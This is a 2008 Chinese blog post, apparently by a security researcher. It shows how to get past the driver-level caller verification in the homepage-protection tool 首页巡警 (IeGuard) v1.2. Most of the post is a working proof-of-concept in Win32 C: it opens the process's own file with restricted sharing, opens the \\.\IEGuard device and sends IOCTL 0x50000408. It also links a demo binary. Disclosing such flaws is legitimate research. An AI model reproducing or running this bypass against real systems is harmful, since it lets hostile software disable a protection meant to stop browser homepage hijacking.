百度空间 | 百度首页 
               
 
查看文章
  
四行代码绕过首页巡警v1.2
2008-05-28 13:42

首页巡警v1.2版加入了一个校验,在发送IRP_MJ_CREATE请求到其驱动时,会打开当前进程的SectionObject->SegmentObject->BaseAddress->FileObject,并打开进程文件进行校验,若不是IeGuard的话,就拒绝操作其驱动

不过,同样非常轻易可以绕过

代码如下:


GetModuleFileName(0 , filename , MAX_PATH);


CreateFile( filename ,
   FILE_READ_DATA ,
   FILE_SHARE_DELETE,
   0,
   OPEN_EXISTING ,
   0,
   0);

HANDLE hdev = CreateFile("\\\\.\\IEGuard" ,
   FILE_READ_ATTRIBUTES ,
   0 ,
   0,
   OPEN_EXISTING ,
   0 ,
   0
   );

DeviceIoControl(hdev ,
   0x50000408 ,
   0 , 0 , 0 , 0 , &retlen , 0 );

测试程序下载:

http://mj0011.ys168.com/

漏洞演示下BypassIeGuard12.rar


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (1)
 
最近读者:
 
网友评论:
1
2008-05-28 13:50 | 回复
对上不放人口A
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu